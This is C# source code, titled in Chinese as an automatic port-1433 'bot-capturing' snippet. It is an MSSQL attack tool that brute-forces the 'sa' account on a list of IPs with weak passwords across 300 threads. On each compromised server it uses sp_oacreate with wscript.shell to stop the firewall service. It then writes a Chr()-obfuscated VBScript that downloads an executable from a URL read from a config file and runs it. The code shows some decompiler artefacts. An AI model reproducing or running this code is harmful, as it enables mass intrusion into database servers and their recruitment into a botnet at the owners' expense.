C#1433全自动抓鸡代码片段
namespace WMIScanner { using System; using System.Collections; using System.Data.SqlClient; using System.IO; using System.Threading; using System.Windows.Forms; public class ScnClass { private string cmdLine = ""; private int inNum = 0; private ArrayList ips = new ArrayList(); private ArrayList rips = new ArrayList(); private Thread[] threads = new Thread[300]; private void CheckRemoteComputer() { int num = 5; int num2 = 5; string[] strArray = new string[num]; string[] strArray2 = new string[num2]; strArray[0] = "sa"; strArray[1] = "sa"; strArray[2] = "sa"; strArray[3] = "sa"; strArray[4] = "sa"; strArray2[0] = ""; strArray2[1] = "sa"; strArray2[2] = "123"; strArray2[3] = "123456"; strArray2[4] = "password"; int num3 = 0; int num4 = 0; int num5 = 0; while ((num3 == 0) && (num4 < 2)) { if (num5 == num2) { num5 = 0; num4++; } try { string str = this.ips.get_Item(int.Parse(Thread.get_CurrentThread().get_Name().ToString())).ToString(); for (int j = 0; j < 5; j++) { SqlConnection connection = new SqlConnection("server=" + str + ";uid=" + strArray[j] + ";pwd=" + strArray2[j] + ";database=Master"); SqlCommand command = new SqlCommand(this.cmdLine, connection); try { WMIScanner.ScnClass class2; connection.Open(); Console.Write(str + " SQL Password is null,Scanned IP like these:" + ((this.rips.get_Count() + 1)).ToString() + ",Sending Command Now...\r\n"); try { command.ExecuteNonQuery(); lock ((class2 = this)) { this.inNum++; Console.Write("***" + str + "Sending Command Completed,Completed number:" + this.inNum.ToString() + " \r\n"); } } catch (Exception exception) { Console.Write(str + "Sending Command failed:" + exception.get_Message().ToString() + "\r\n"); } lock ((class2 = this)) { this.rips.Add(str); } } catch (Exception exception2) { Console.Write(str + " Failure to connect:" + exception2.get_Message().ToString() + "\r\n"); num5++; } num3 = 1; } continue; } catch { continue; } } for (int i = 0; i < this.threads.Length; i++) { if ((this.threads != null) && (this.threads.get_Name().ToLower() == Thread.get_CurrentThread().get_Name().ToLower())) { this.threads = null; break; } } Thread.get_CurrentThread().Abort(); } private int CheckTempThreadIndex() { for (int i = 0; i < this.threads.Length; i++) { if (this.threads == null) { return i; } } return -1; } private void ReadIPS() { StreamReader reader = File.OpenText(Application.get_StartupPath() + @"\ips.txt"); while (reader.Peek() != -1) { this.ips.Add(reader.ReadLine()); } reader.Close(); } private void ScannIPS() { int num = 0; int num2 = 0; while (num2 < this.ips.get_Count()) { try { int index = this.CheckTempThreadIndex(); if (index >= 0) { this.threads[index] = new Thread(new ThreadStart(this, this.CheckRemoteComputer)); this.threads[index].set_IsBackground(true); this.threads[index].set_Name(num2.ToString()); this.threads[index].Start(); num2++; num = 0; } else { num += 100; Thread.Sleep(300); } continue; } catch { num = 0; continue; } } num = 0; bool flag = false; while (!flag) { Thread.Sleep(0x3e8); flag = true; for (int i = 0; i < this.threads.Length; i++) { if (this.threads != null) { flag = false; num += 0x3e8; break; } } if (num >= 0xea60) { for (int j = 0; j < this.threads.Length; j++) { if (this.threads[j] != null) { try { this.threads[j].Abort(); } catch { } this.threads[j] = null; } } num = 0; return; } } } public void Task() { string str = File.OpenText(Application.get_StartupPath() + @"\url.sys").ReadLine(); Console.Write("Reading Command....\r\n"); this.cmdLine = this.cmdLine + "declare @cmd INT;"; this.cmdLine = this.cmdLine + "exec sp_oacreate 'wscript.shell',@cmd output;"; this.cmdLine = this.cmdLine + "exec sp_oamethod @cmd,'run',null,'cmd /c net1 stop sharedaccess"; this.cmdLine = this.cmdLine + "&echo on error resume next>>run.vbs"; this.cmdLine = this.cmdLine + "&echo set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))>run.vbs"; this.cmdLine = this.cmdLine + "&echo Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))>>run.vbs"; this.cmdLine = this.cmdLine + "&echo xPost.Open Chr(71)+Chr(69)+Chr(84)," + str + ",Chr(48)>>run.vbs"; this.cmdLine = this.cmdLine + "&echo xPost.Send()>>run.vbs"; this.cmdLine = this.cmdLine + "&echo Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))>>run.vbs"; this.cmdLine = this.cmdLine + "&echo sGet.Mode = Chr(51)>>run.vbs"; this.cmdLine = this.cmdLine + "&echo sGet.Type = Chr(49)>>run.vbs"; this.cmdLine = this.cmdLine + "&echo sGet.Open()>>run.vbs"; this.cmdLine = this.cmdLine + "&echo sGet.Write(xPost.responseBody)>>run.vbs"; this.cmdLine = this.cmdLine + "&echo sGet.SaveToFile Chr(50)+Chr(48)+Chr(48)+Chr(56)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)>>run.vbs"; this.cmdLine = this.cmdLine + "&echo oshell.run Chr(50)+Chr(48)+Chr(48)+Chr(56)+Chr(46)+Chr(101)+Chr(120)+Chr(101)>>run.vbs"; this.cmdLine = this.cmdLine + "&cscript run.vbs','0','true'"; Console.Write("Scanning weak passwords...\r\n"); if (File.Exists(Application.get_StartupPath() + @"\ips.txt")) { Console.Write("Read IP Addresses...\r\n"); this.ReadIPS(); if (this.ips.get_Count() > 0) { Console.Write("Scan Now....\r\n"); this.ScannIPS(); Console.Write("IP Paragraph Scan Finish...\r\n"); } } } } }